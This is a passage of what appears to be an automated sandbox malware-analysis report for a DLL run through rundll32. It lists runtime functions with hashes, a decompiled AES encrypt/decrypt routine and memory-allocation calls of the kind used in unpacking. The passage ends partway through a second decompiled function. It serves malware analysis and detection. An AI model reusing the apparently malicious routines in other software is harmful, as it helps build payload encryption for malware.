Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: ece5ec2f0c168ecf9f6dbddc1a7bc5bbb7d48131baad19b0d02045314394d4da
Instruction ID: 9a9e7d0d96b9b98f282b6b3d99ce21584d431bb31bbb8c13abfb4cf7588d129e
Opcode Fuzzy Hash: ece5ec2f0c168ecf9f6dbddc1a7bc5bbb7d48131baad19b0d02045314394d4da
Instruction Fuzzy Hash: C631DF70A04A099FDF14CFE8D805ADDBBB9BF16300F01405EF4519BA40CBB49D86EB15

Uniqueness

Uniqueness Score: -1.00%

Function 6E201AA3, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E201B25
_free.LIBCMT ref: 6E201B49
_free.LIBCMT ref: 6E201CD6
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E194D40), ref: 6E201CE8
_free.LIBCMT ref: 6E201EA2

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 39a213624def8960b7eca6083b3279293de548559d8dc208cf17811b70f90f4e
Instruction ID: d47949da34991abae25307b87d3870396d05a733efbdab4109cba0bc31238cfc
Opcode Fuzzy Hash: 39a213624def8960b7eca6083b3279293de548559d8dc208cf17811b70f90f4e
Instruction Fuzzy Hash: 41C11675A0411EDBDB10CFE8C850AEE7BFFAF46319F14495AD591972C0E7318A8ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E2097A8, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E2097C0

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E2097D2
_free.LIBCMT ref: 6E2097E4
_free.LIBCMT ref: 6E2097F6
_free.LIBCMT ref: 6E209808

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 38b3a0c68b83af7d4c60856a542d4275541f37c664b34fce40e1dd20ff4cf562
Instruction ID: f96d496cd768f506663559e6e29d70472a57450e511bf5f7f884ae73dab55d72
Opcode Fuzzy Hash: 38b3a0c68b83af7d4c60856a542d4275541f37c664b34fce40e1dd20ff4cf562
Instruction Fuzzy Hash: 3DF04F7290460EDB8A62DA98D4D6D9B33FFAA857157600D45E019DBA84CF20F8838AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E0230, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 6E1E0255
CatchIt.LIBVCRUNTIME ref: 6E1E033B

Strings

RCC, xrefs: 6E1E026F
MOC, xrefs: 6E1E0267

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: b74a50174b272b65fd5755f54497048301d0dc0a730c83e9ddf67582a7103226
Instruction ID: 09812eb572f88051b1b6523a13d7fef47d65203ebcaacdc309d2dc04bd515dd1
Opcode Fuzzy Hash: b74a50174b272b65fd5755f54497048301d0dc0a730c83e9ddf67582a7103226
Instruction Fuzzy Hash: BF41597290060AEFDF05CFD4CD80ADEBBB5BF48304F294059F9186A221E7359A91EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF3C4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 6E1DF458

Strings

MOC, xrefs: 6E1DF3D6
csm, xrefs: 6E1DF3DE
RCC, xrefs: 6E1DF3CE

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: dd77ffe40cd1e8b56f92300ae912e55f6935dfb604c8c3f8fea01644735e1955
Instruction ID: df07498269ba94c48aa618e6ac6e95d2402d547aa54544affb8b60c40df23f57
Opcode Fuzzy Hash: dd77ffe40cd1e8b56f92300ae912e55f6935dfb604c8c3f8fea01644735e1955
Instruction Fuzzy Hash: A4115E72504216EFD714CFE4C440AD9B7A8EF58315F36449AE8609B260D7B4EFC8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E206E99, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E206F20

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 869dc4886e6a6f5b561d51b04d4c0ce346a2230bcee0f7184eb0f62dba287ef0
Instruction ID: ba8c59ad215e02c1a2c86368be73c70d4f8792954acb60449382fe6cc0a27bfa
Opcode Fuzzy Hash: 869dc4886e6a6f5b561d51b04d4c0ce346a2230bcee0f7184eb0f62dba287ef0
Instruction Fuzzy Hash: 0CB1587191424E9FEB11DFA8C890BEEBBF7EF85300F1845A9E4559B3C0D6748A42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E38E5, Relevance: 6.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1E38EC
UnDecorator::getSymbolName.LIBCMT ref: 6E1E397A
DName::operator+.LIBCMT ref: 6E1E3A7E

Part of subcall function 6E1E148F: shared_ptr.LIBCMT ref: 6E1E14AB

DName::DName.LIBVCRUNTIME ref: 6E1E3B3B

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
String ID:
API String ID: 334624791-0
Opcode ID: c2f40437fbe2cdcb5b514af99b10a1e46a699f528f29111281d4bff4954110d5
Instruction ID: 788678deacd600c842507591c9958627e2a952d00931a679bf1be25158dcb251
Opcode Fuzzy Hash: c2f40437fbe2cdcb5b514af99b10a1e46a699f528f29111281d4bff4954110d5
Instruction Fuzzy Hash: 9A81A075D04A098FDB04CFD4C459BEDBBB5BF09700F24406AF902ABAA0D7349A82DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFC23, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6E1DFCEA
___AdjustPointer.LIBCMT ref: 6E1DFD0D
___AdjustPointer.LIBCMT ref: 6E1DFDA9

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 3e01f91299c94dcc774d947c138fffaf3ec31a7d7fe0365a1e50abcff5f7ef0b
Instruction ID: 67cddffe3837fc63d73840d07328cd8d0e21cdb785579157f7ee4b243cf91b4b
Opcode Fuzzy Hash: 3e01f91299c94dcc774d947c138fffaf3ec31a7d7fe0365a1e50abcff5f7ef0b
Instruction Fuzzy Hash: AC510372504A07AFDB148FD5D850BAA73B5EF19314F30092DED254B2A0E731EAD8E790

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3F92, Relevance: 6.1, APIs: 4, Instructions: 144COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1E401A

Part of subcall function 6E1E1130: __aulldvrm.LIBCMT ref: 6E1E1161

DName::operator+.LIBCMT ref: 6E1E4027
DName::operator=.LIBVCRUNTIME ref: 6E1E40A7
DName::DName.LIBVCRUNTIME ref: 6E1E40C7

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: f847c0b7c92ff123e277dfc4bd0f4996b11cff01a6bf3961fcd27f5ae4bf347c
Instruction ID: d557ede8aeb8632d66c0ff24224979aa05b50dbd0689734f4bec5be366ca53bf
Opcode Fuzzy Hash: f847c0b7c92ff123e277dfc4bd0f4996b11cff01a6bf3961fcd27f5ae4bf347c
Instruction Fuzzy Hash: 2A518E75900A19DFCB05CF98C9516EEBBB4FB16700F1181AAF5119BB90D770AAC2DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EF035, Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32db720dd2b773cf8f2003f4d67849fa130cfdb7d0dab187eb8489d1dd80e6df
Instruction ID: a11a98d19e5b821c9b42435c4cc81ea7b0c0a8dddcc855cd18672410a97a2165
Opcode Fuzzy Hash: 32db720dd2b773cf8f2003f4d67849fa130cfdb7d0dab187eb8489d1dd80e6df
Instruction Fuzzy Hash: 4C411A72600B08AFE315DFB8DC00BDEBBE9EB8D710F204929F525DB680D3709A819780

Uniqueness

Uniqueness Score: -1.00%

Function 6E200B42, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4bc2f14adc6c7bc3b42b024870a8aef56e00d0ab8883960101c6c4e449cd667
Instruction ID: 7d796a9c44e93519ef79ff1f56faafea14c8054d5abecd265e2128ac668a1eb2
Opcode Fuzzy Hash: c4bc2f14adc6c7bc3b42b024870a8aef56e00d0ab8883960101c6c4e449cd667
Instruction Fuzzy Hash: F421087295562AABE7514EE88C54F5A3B6A9F027A9F110910ED2AA72C1F630E901C5E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FDDF6, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E20DD5B,00000000,00000001,6E2057FE,?,6E20E22B,00000001,?,?,?,6E2055A5,?,00000000), ref: 6E1FDDFB
_free.LIBCMT ref: 6E1FDE58
_free.LIBCMT ref: 6E1FDE8E
SetLastError.KERNEL32(00000000,6E21B05C,000000FF,?,6E20E22B,00000001,?,?,?,6E2055A5,?,00000000,00000000,6E21A818,0000002C,6E2057FE), ref: 6E1FDE99

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b85c645de2ee511540c8ed637e07f320a1051d6caad6d8823c986dc0009544c7
Instruction ID: 19b6621cf91f53700cce6328cf5b12bea227c632d00809503409593d96d0de21
Opcode Fuzzy Hash: b85c645de2ee511540c8ed637e07f320a1051d6caad6d8823c986dc0009544c7
Instruction Fuzzy Hash: E211C876648605EF971155E48C99FBB12EF8BE26797310A24E234861C1EF618883B9B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FDF4D, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E1FD6F8,6E200144,?,?,6E1DDC30,?,?,6E1DC69D,000008DA,6E21B004), ref: 6E1FDF52
_free.LIBCMT ref: 6E1FDFAF
_free.LIBCMT ref: 6E1FDFE5
SetLastError.KERNEL32(00000000,6E21B05C,000000FF,?,?,?,6E1FD6F8,6E200144,?,?,6E1DDC30,?,?,6E1DC69D,000008DA,6E21B004), ref: 6E1FDFF0

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 5b7e2d9f70eb2bb3f875c23c9150b551f4a8a4523e28f65069abd4e9f5016261
Instruction ID: c3c4b33fb4c682f6236b5cfb4def225ba87eee4c1ab4da00567f9ae93d0a8fdb
Opcode Fuzzy Hash: 5b7e2d9f70eb2bb3f875c23c9150b551f4a8a4523e28f65069abd4e9f5016261
Instruction Fuzzy Hash: 6C11A776248601EE971155F98C89FFA22EF9BC267C7310724F634C66C4EE608843A9B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E744F, Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,?,6E1E7510,00000000,?,00000001,?,?,6E1E7643,00000001,6E192674,6E19266C,6E192674), ref: 6E1E74DF

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 092654cf6b22f4f21f39abd56b84ab6bebdaf679fe9f8e2afc23f6aa73aef634
Instruction ID: 54830b0a2e1dde041782f6f019a7d974abc263dd21f18594f08f3ff04cd30981
Opcode Fuzzy Hash: 092654cf6b22f4f21f39abd56b84ab6bebdaf679fe9f8e2afc23f6aa73aef634
Instruction Fuzzy Hash: EA115032A10F21ABFB528BE88C04B493BA4AF02770F250511FE14EB6C5D730ED80E6D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E213B2A, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6E2057FE,00000000,?,?,6E2129AD,?,00000001,?,00000001,?,6E20DCEA,00000000,00000000,00000001), ref: 6E213B41
GetLastError.KERNEL32(?,6E2129AD,?,00000001,?,00000001,?,6E20DCEA,00000000,00000000,00000001,00000000,00000001,?,6E20E24F,6E2055A5), ref: 6E213B4D

Part of subcall function 6E213B13: CloseHandle.KERNEL32(6E21B940,6E213B5D,?,6E2129AD,?,00000001,?,00000001,?,6E20DCEA,00000000,00000000,00000001,00000000,00000001), ref: 6E213B23

___initconout.LIBCMT ref: 6E213B5D

Part of subcall function 6E213AD5: CreateFileW.KERNEL32(6E197E28,40000000,00000003,00000000,00000003,00000000,00000000,6E213B04,6E21299A,00000001,?,6E20DCEA,00000000,00000000,00000001,00000000), ref: 6E213AE8

WriteConsoleW.KERNEL32(?,?,6E2057FE,00000000,?,6E2129AD,?,00000001,?,00000001,?,6E20DCEA,00000000,00000000,00000001,00000000), ref: 6E213B72

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2153114fc76cf1c1e26cd81f5509af08bce40c1cc1cb59c7c46521402f8b3cab
Instruction ID: 4a36cef5c7aa50f8cb5ce13b889e23cc369c783043499308e59e983d1515f7f8
Opcode Fuzzy Hash: 2153114fc76cf1c1e26cd81f5509af08bce40c1cc1cb59c7c46521402f8b3cab
Instruction Fuzzy Hash: 2EF01C36555619BBCF525FD1CC0CAC93FA7FF0A3A5B054410FB0996220EB328A20EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E203A55, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 6E20358B: GetOEMCP.KERNEL32(00000000,6E2037FD,6E20D971,00000000,00000000,00000000,00000000,?,6E20D971), ref: 6E2035B6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6E203844,?,00000000,6E20D971,558B0000,?,?,?,?,00000000), ref: 6E203AB3
GetCPInfo.KERNEL32(00000000,D8 n,?,?,6E203844,?,00000000,6E20D971,558B0000,?,?,?,?,00000000,00000000), ref: 6E203AF5

Strings

D8 n, xrefs: 6E203AF0, 6E203AF3

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: CodeInfoPageValid
String ID: D8 n
API String ID: 546120528-549768355
Opcode ID: 5c0b9f8d39b21a1f246da8c292ffb7e7b90111c8a0aa58923eb37e7c45db2505
Instruction ID: ec3b8f7f47f2f38aaeab5dc9e4aad3aecac5836c6682417675c66b7183be7cf5
Opcode Fuzzy Hash: 5c0b9f8d39b21a1f246da8c292ffb7e7b90111c8a0aa58923eb37e7c45db2505
Instruction Fuzzy Hash: AA512170A0464E9FD7118FA6C498EEABBFBFF41308F10446ED0928B291E7749146CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F2273, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E1F22B6, 6E1F22BD, 6E1F22F3

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 9ff4513d1de4845084a23672796317165a53e1b31c0d004f5b8dd152c9262bd0
Instruction ID: 34aa95cbe0caf5150ff6c6f60bd93d54b086d7fa865c0ad4554f7a098c4761b5
Opcode Fuzzy Hash: 9ff4513d1de4845084a23672796317165a53e1b31c0d004f5b8dd152c9262bd0
Instruction Fuzzy Hash: 984184B1E04659EFDB11DFD9C8849DEBBFDEB99710B200466E51497240EB708A82EFD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2037E2, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6E20358B: GetOEMCP.KERNEL32(00000000,6E2037FD,6E20D971,00000000,00000000,00000000,00000000,?,6E20D971), ref: 6E2035B6

_free.LIBCMT ref: 6E20385A

Strings

xd, xrefs: 6E2038F1

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free
String ID: xd
API String ID: 269201875-1225310755
Opcode ID: 5b5d59ae1875659c2d010411e6e31a7a356137c9a38f33f8b3b0df04390d2e8c
Instruction ID: 4fd495bbb2a1673f73e36d55b2f72f9336c3030417fb00d759e14fb99cf2b138
Opcode Fuzzy Hash: 5b5d59ae1875659c2d010411e6e31a7a356137c9a38f33f8b3b0df04390d2e8c
Instruction Fuzzy Hash: DE31927290424EAFDB01CF98C848FDE77FABF44324F1144A9E9149B290EB31D951CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F11AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6E1F1207
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1F122D

Strings

$KL, xrefs: 6E1F1212

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID: $KL
API String ID: 1992179935-2900536411
Opcode ID: 4a7cf78e14aefecc5d7fe0d642392f834ed758bf7f7f337a80a50e73d88b6ed3
Instruction ID: ca2c88dba8b7d02bb0a48d10132aab5683aac70da26009302041a70753f856d3
Opcode Fuzzy Hash: 4a7cf78e14aefecc5d7fe0d642392f834ed758bf7f7f337a80a50e73d88b6ed3
Instruction Fuzzy Hash: C911E5B2A54308EFDB11DFE88C40BDEB6FDEB81758F214868D400B7141D374AE869A94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4576 Parent PID: 3868 rundll32.exeCOMMON

Executed Functions

Function 00E839C5, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E839C5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				char _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xe8a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					_t8 =  &_v56; // 0xe84a23
					memcpy(_t8, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xe8a0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00E86837(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xe8a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00E850CA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x00e839ce
0x00e839d4
0x00e839d7
0x00e839dd
0x00e839dd
0x00e839df
0x00e839e1
0x00e839e4
0x00e839ea
0x00e839eb
0x00e839ec
0x00e839f2
0x00e839f7
0x00e839fd
0x00e83a05
0x00e83b62
0x00e83a0b
0x00e83a0d
0x00e83a12
0x00e83a16
0x00e83a1b
0x00e83a2d
0x00e83a30
0x00e83a34
0x00e83a3b
0x00e83a3f
0x00e83a47
0x00e83b4d
0x00e83a4d
0x00e83a4d
0x00e83a51
0x00e83a52
0x00e83a54
0x00e83a5f
0x00e83b39
0x00e83a65
0x00e83a65
0x00e83a68
0x00e83a6e
0x00e83a74
0x00e83a74
0x00e83a7c
0x00e83a80
0x00e83a83
0x00e83b2a
0x00e83a89
0x00e83a8f
0x00e83a92
0x00e83a95
0x00e83a97
0x00e83a9a
0x00e83a9d
0x00e83a9f
0x00e83a9f
0x00e83aa9
0x00e83aae
0x00e83ab1
0x00e83ab4
0x00e83ab6
0x00e83abf
0x00e83ae9
0x00e83ac1
0x00e83ad2
0x00e83ad2
0x00e83af1
0x00000000
0x00000000
0x00e83af3
0x00e83af6
0x00e83af9
0x00e83afd
0x00000000
0x00e83aff
0x00e83b0e
0x00e83b14
0x00e83b1c
0x00e83b1c
0x00000000
0x00e83afd
0x00e83b01
0x00e83b09
0x00e83b0c
0x00e83b23
0x00000000
0x00000000
0x00000000
0x00e83b0c
0x00e83a83
0x00e83b3c
0x00e83b3f
0x00e83b3f
0x00e83b54
0x00e83b54
0x00e83b6c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00E84A23,00000001,00E870D9,00000000), ref: 00E839FD
memcpy.NTDLL(#J,00E870D9,00000010,?,?,?,00E84A23,00000001,00E870D9,00000000,?,00E862B1,00000000,00E870D9,?,00000000), ref: 00E83A16
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00E83A3F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00E83A57
memcpy.NTDLL(00000000,00000000,05499630,00000010), ref: 00E83AA9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05499630,00000020,?,?,00000010), ref: 00E83AD2
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05499630,?,?,00000010), ref: 00E83AE9
GetLastError.KERNEL32(?,?,00000010), ref: 00E83B01
GetLastError.KERNEL32 ref: 00E83B33
CryptDestroyKey.ADVAPI32(00000000), ref: 00E83B3F
GetLastError.KERNEL32 ref: 00E83B47
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E83B54
GetLastError.KERNEL32(?,?,?,00E84A23,00000001,00E870D9,00000000,?,00E862B1,00000000,00E870D9,?,00000000,00E870D9,00000000,05499630), ref: 00E83B5C

Strings

#J, xrefs: 00E83A12, 00E83A15

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID: #J
API String ID: 1967744295-3235508299
Opcode ID: 34d922c8211167d15f3a00a460ed567ada8e6eb5679b3d4f132eebecbc5e499c
Instruction ID: 8fbc81890661a8d82bb7ba89cf4b82ce5c74e0b401c4a0fd3c305c066a578d19
Opcode Fuzzy Hash: 34d922c8211167d15f3a00a460ed567ada8e6eb5679b3d4f132eebecbc5e499c
Instruction Fuzzy Hash: 2E514AB1900208FFDB10AFB5DC84AEEBBB9EB04744F148466F909F6260D7359E149B21

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E801, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000995,00003000,00000040,00000995,6E21E250), ref: 6E21E8BE
VirtualAlloc.KERNEL32(00000000,0000006C,00003000,00000040,6E21E2B3), ref: 6E21E8F5
VirtualAlloc.KERNEL32(00000000,0000E3F3,00003000,00000040), ref: 6E21E955
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E21E98B
VirtualProtect.KERNEL32(6E190000,00000000,00000004,6E21E7E0), ref: 6E21EA90
VirtualProtect.KERNEL32(6E190000,00001000,00000004,6E21E7E0), ref: 6E21EAB7
VirtualProtect.KERNEL32(00000000,?,00000002,6E21E7E0), ref: 6E21EB84
VirtualProtect.KERNEL32(00000000,?,00000002,6E21E7E0,?), ref: 6E21EBDA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E21EBF6

Memory Dump Source

Source File: 00000003.00000002.479550747.000000006E21E000.00000040.00020000.sdmp, Offset: 6E21E000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: c0946dfdec6311ad968fb05df371b2da3969ec27e83de0aba38451b992102b3d
Instruction ID: d570e779a3d3aa566727af6405cb063cd0a42490eee5937a6ff39ab6ffc0e1b2
Opcode Fuzzy Hash: c0946dfdec6311ad968fb05df371b2da3969ec27e83de0aba38451b992102b3d
Instruction Fuzzy Hash: 93D19F765041069FDB66CF44CCA0F9277A6FF48312B190194ED0A9FBFAD770A922CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00E84454, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00E84454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xe8a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00E8143F( &_v12, _t64);
				if(_t65 != 0) {
